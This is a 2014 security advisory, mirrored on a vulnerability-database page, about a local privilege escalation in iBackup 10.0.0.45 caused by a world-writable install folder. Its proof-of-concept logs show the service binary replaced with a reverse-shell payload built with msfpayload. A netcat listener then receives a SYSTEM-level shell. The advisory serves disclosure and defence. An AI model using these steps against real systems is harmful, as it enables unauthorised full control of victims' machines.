Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHadji SamirPACKETSTORM:129663
HistoryDec 19, 2014 - 12:00 a.m.

iBackup 10.0.0.45 Privilege Escalation

2014-12-1900:00:00
Hadji Samir
packetstormsecurity.com
24
JSON
`Document Title:  
===============  
iBackup v10.0.0.45 - Privilege Escalation Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1382  
  
  
Release Date:  
=============  
2014-12-18  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1382  
  
  
Common Vulnerability Scoring System:  
====================================  
6.2  
  
  
Product & Service Introduction:  
===============================  
With IBackup, you can backup/restore interactively or schedule regular online backups for Windows desktops, laptops and servers.   
It has a simple, user- friendly interface coupled with powerful scheduling and logging features. IBackup automatically selects   
critical data (Desktop, Music, Pictures, Videos, Documents, Windows Mail, Favourites) for backup. Advanced features include Open   
file Backup, System State backup, MS SQL Server, MS Exchange Server, Hyper-V, MS SharePoint Server and Oracle Server backups.  
  
(Copy of the Vendor Homepage: https://www.ibackup.com/ibwin/downloads/IBackupsetup.exe )  
  
  
Abstract Advisory Information:  
==============================  
An independent vulnerability laboratory researcher discovered a a local privilege escalation vulnerability in the official Pro Softnet Corporation iBackup v10.0.0.45 software.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2014-12-18: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Pro Softnet Corporation  
Product: iBackup - Server Software 10.0.0.45  
  
  
Exploitation Technique:  
=======================  
Local  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A local privilege escalation vulnerability has been discovered in the official iBackup v10.0.0.45 software.  
The vulnerability allows local attackers to gain higher access privileges by execution of arbitrary codes.  
  
The `ibservice` service for windows could potentially allow an authorized but non-privileged local user to   
execute arbitrary code with elevated privileges on the system. A successful attempt would require the local   
user to be able to insert their code in the system root path undetected by the OS or other security applications   
where it could potentially be executed during application startup or reboot. If successful, the local user`s code   
would execute with the elevated privileges of the application.  
  
The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability   
scoring system) count of 6.2. Exploitation of the vulnerability requires a local privileged systen user account   
without user for interaction. Successful exploitation of the arbitrary code execution vulnerability results in   
software- or system compromise.  
  
  
Proof of Concept (PoC):  
=======================  
The vulnerability can be exploited by local attackers with low privileged or restricted system user account and without user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.  
  
--- PoC Session Logs ---  
C:\Users\s-dz\Desktop>sc qc ibservice  
[SC] QueryServiceConfig réussite(s)  
  
SERVICE_NAME: ibservice  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : IBackup Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem*  
-  
C:\Users\s-dz\Desktop>sc qc ibservice  
[SC] QueryServiceConfig réussite(s)  
  
SERVICE_NAME: ibservice  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : IBackup Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
-  
C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\IBackupWindows\"  
C:\Program Files\IBackupWindows  
Medium Mandatory Level (Default) [No-Write-Up]  
RW Tout le monde  
FILE_ADD_FILE  
FILE_ADD_SUBDIRECTORY  
FILE_LIST_DIRECTORY  
FILE_READ_ATTRIBUTES  
FILE_READ_EA  
FILE_TRAVERSE  
FILE_WRITE_ATTRIBUTES  
FILE_WRITE_EA  
DELETE  
SYNCHRONIZE  
READ_CONTROL  
RW NT SERVICE\TrustedInstaller  
FILE_ALL_ACCESS  
RW AUTORITE NT\SystÞme  
FILE_ALL_ACCESS  
RW BUILTIN\Administrateurs  
FILE_ALL_ACCESS  
R BUILTIN\Utilisateurs  
FILE_LIST_DIRECTORY  
FILE_READ_ATTRIBUTES  
FILE_READ_EA  
FILE_TRAVERSE  
SYNCHRONIZE  
READ_CONTROL  
  
############## PROOF  
C:\Users\s-dz\Desktop>net user s-dz  
Nom d'utilisateur s-dz  
Nom complet s-dz  
Commentaire  
Commentaires utilisateur  
Code du pays 000 (Valeur par défaut du système)  
Compte : actif Oui  
Le compte expire Jamais  
  
Mot de passe : dernier changmt. 18/12/2014 01:12:55  
Le mot de passe expire Jamais  
Le mot de passe modifiable 18/12/2014 01:12:55  
Mot de passe exigé Oui  
L'utilisateur peut changer de mot de passe Oui  
  
Stations autorisées Tout  
Script d'ouverture de session  
Profil d'utilisateur  
Répertoire de base  
Dernier accès 18/12/2014 06:04:49  
  
Heures d'accès autorisé Tout  
  
Appartient aux groupes locaux *Utilisateurs  
Appartient aux groupes globaux *None  
La commande s'est terminée correctement.  
  
  
C:\Users\s-dz\Desktop>  
  
root@samir:~# msfpayload windows/shell_reverse_tcp lhost='192.168.1.5' lport='4433' X > C:\Users\s-dz\Desktop\evil-ZDserv.exe  
  
  
C:\Users\s-dz\Desktop>copy evil-ZDserv.exe "C:\Program Files\IBackupWindows\ib_service.exe"  
Remplacer C:\Program Files\IBackupWindows\ib_service.exe (Oui/Non/Tous) : o  
1 fichier(s) copié(s).  
  
e will open cmd with administrator for start service ibservice  
C:\Users\s-dz\Desktop>sc start ibservice  
  
now nc ... (user)  
  
C:\Users\s-dz\Desktop>nc.exe -lvp 4433  
listening on [any] 4433 ...  
connect to [192.168.1.5] from s-dz [192.168.1.5] 16040  
Microsoft Windows [version 6.1.7600]  
Copyright (c) 2009 Microsoft Corporation. Tous droits réservés.  
  
C:\Windows\system32>whoami  
whoami  
autorite nt\système  
  
C:\Windows\system32>  
  
  
Security Risk:  
==============  
The security risk of the of the local privilege escalation software vulnerability in the root path is estimated as high. (CVSS 6.2)  
  
  
Credits & Authors:  
==================  
Hadji Samir [email protected]  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,   
policies, deface websites, hack into databases or trade with fraud/stolen material.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Contact: [email protected] - [email protected] - [email protected]  
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/  
  
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to   
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website   
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact   
([email protected] or [email protected]) to get a permission.  
  
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
CONTACT: [email protected]  
PGP KEY: http://www.vulnerability-lab.com/keys/[email protected]%280x198E9928%29.txt  
  
`
JSON